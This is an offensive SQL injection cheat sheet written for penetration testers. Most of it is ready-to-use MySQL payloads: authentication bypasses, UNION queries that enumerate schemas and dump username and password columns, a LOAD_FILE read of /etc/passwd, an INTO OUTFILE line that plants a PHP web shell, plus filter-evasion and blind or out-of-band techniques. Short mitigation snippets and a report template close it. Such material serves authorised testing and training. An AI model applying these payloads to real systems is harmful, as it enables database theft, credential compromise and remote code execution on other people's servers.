π‘οΈ Methodology Checklist
- Test all input fields: add
'and check for errors - Identify DB type from error messages or behaviour
- Column count:
ORDER BY Nuntil error - UNION injection:
UNION SELECT NULL,NULL,... - Data extraction: union to dump users, passwords, sensitive tables
- Blind time-based:
AND SLEEP(5)(MySQL) /WAITFOR DELAY '0:0:5'(MSSQL) - Out-of-band: DNS exfil with
LOAD_FILEor MSSQLxp_dirtree - Try SQLMap for automated exploitation after manual confirmation
π― Operational Context
Use when: SQL injection identified β quick reference for UNION payload construction, comment syntax, and database-specific functions.
Think Dumber First: Identify DB first: @@version (MSSQL/MySQL), version() (PostgreSQL), banner (Oracle). Then match cheat sheet to identified DB. Wrong DB syntax = all payloads fail.
Skip when: N/A β reference document.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
' | Probe for SQLi β syntax error confirms string context |
admin'-- - | Auth bypass: comment out password check |
admin')-- - | Auth bypass: close parenthesis first |
' OR '1'='1 | Universal auth bypass β no trailing quote |
cn' ORDER BY 1-- - | Column count discovery (increment until error) |
cn' UNION SELECT 1,2,3,4-- - | Column count discovery (increment until success) |
cn' UNION SELECT NULL,NULL,NULL,NULL-- - | NULL padding (strict type bypass) |
cn' UNION SELECT 1,@@version,3,4-- - | DBMS fingerprint / reflection point confirm |
cn' UNION SELECT 1,schema_name,3,4 FROM INFORMATION_SCHEMA.SCHEMATA-- - | List all databases |
cn' UNION SELECT 1,database(),3,4-- - | Current database |
cn' UNION SELECT 1,TABLE_NAME,TABLE_SCHEMA,4 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='[DB]'-- - | List tables in DB |
cn' UNION SELECT 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='[TABLE]'-- - | List columns |
cn' UNION SELECT 1,username,password,4 FROM [DB].[TABLE]-- - | Dump data (dot operator!) |
cn' UNION SELECT 1, user(), 3, 4-- - | Current DB user |
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- - | Read OS file (FILE privilege required) |
cn' UNION SELECT "", '<?php system($_REQUEST[0]); ?>', "", "" INTO OUTFILE '/var/www/html/shell.php'-- - | Drop web shell |
π¬ Deep Dive & Workflow
MySQL Comment Variants
-- - β dash-dash-SPACE-dash (space is mandatory; extra dash ensures it)
# β hash (URL: %23)
'--+ β URL-encoded for GET/browser (+ = space)
')-- - β close paren before commentingAuth Bypass Quick Reference
admin'-- - β known user, comment out password
' OR '1'='1 β unknown user, inject both fields (no trailing quote)
admin' OR '1'='1 β known user, OR bypass (dev's quote closes it)
admin')-- - β nested query: close paren firstUNION Attack Checklist
- Confirm injection:
'β syntax error - Count columns:
ORDER BY Nuntil error, orUNION SELECT 1,2,...until success - Find reflection points: visible integers in response
- Force first row: use
id=-1or non-existent value to surface UNION results - Fingerprint:
@@version,POW(1,1),SLEEP(5) - Enumerate schema via INFORMATION_SCHEMA
- Dump target data with dot operator
Escalation Decision Tree
Have FILE privilege + empty secure_file_priv?
βββ Yes β LOAD_FILE for read; INTO OUTFILE for web shell
βββ No β Stick to database enumeration; look for hardcoded creds in app tables
CONCAT for Single Reflection Point
cn' UNION SELECT 1, CONCAT(username, ':', password), 3, 4 FROM dev.credentials-- -
cn' UNION SELECT 1, GROUP_CONCAT(username, ':', password SEPARATOR '\n'), 3, 4 FROM dev.credentials-- -Mitigation Snippets (Defensive)
// Prepared statements (gold standard)
$stmt = mysqli_prepare($conn, "SELECT * FROM logins WHERE username=? AND password=?");
mysqli_stmt_bind_param($stmt, 'ss', $username, $password);
// Least privilege
CREATE USER 'webuser'@'localhost';
GRANT SELECT ON ilfreight.ports TO 'webuser'@'localhost' IDENTIFIED BY 'p@ssw0Rd!!';π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| UNION injection column count wrong | Column mismatch | Find count: ORDER BY 1--, ORDER BY 2-- until error; column before error = count |
| String concatenation syntax varies | DB-specific | MySQL: CONCAT(a,b) or a,b; MSSQL: a+b; Oracle: a||b; PostgreSQL: a||b |
| NULL vs string column types | Type mismatch in UNION | Use NULL for unknown: UNION SELECT NULL,NULL,NULL--; replace NULLs with values one at a time |
| Comments blocked | Filter on β or # | Try: --+, -- -, /*!*/, /**/, %23 (URL encoded #) |
| Stacked queries fail | DB or driver doesnβt support | MySQL via PHP PDO: no stacked queries; try time-based blind instead |
π Reporting Trigger
Finding Title: SQL Injection β Cheat Sheet Applied for Database Extraction Impact: SQL injection exploitation enables reading arbitrary database content, bypassing authentication, executing OS commands (via xp_cmdshell or UDF), and potentially compromising the underlying server depending on database privileges. Root Cause: User input concatenated into SQL queries without parameterization. Recommendation: Use parameterized queries / prepared statements for all database interactions. Implement allowlist input validation. Apply least-privilege to database accounts. Deploy WAF with SQLi detection rules.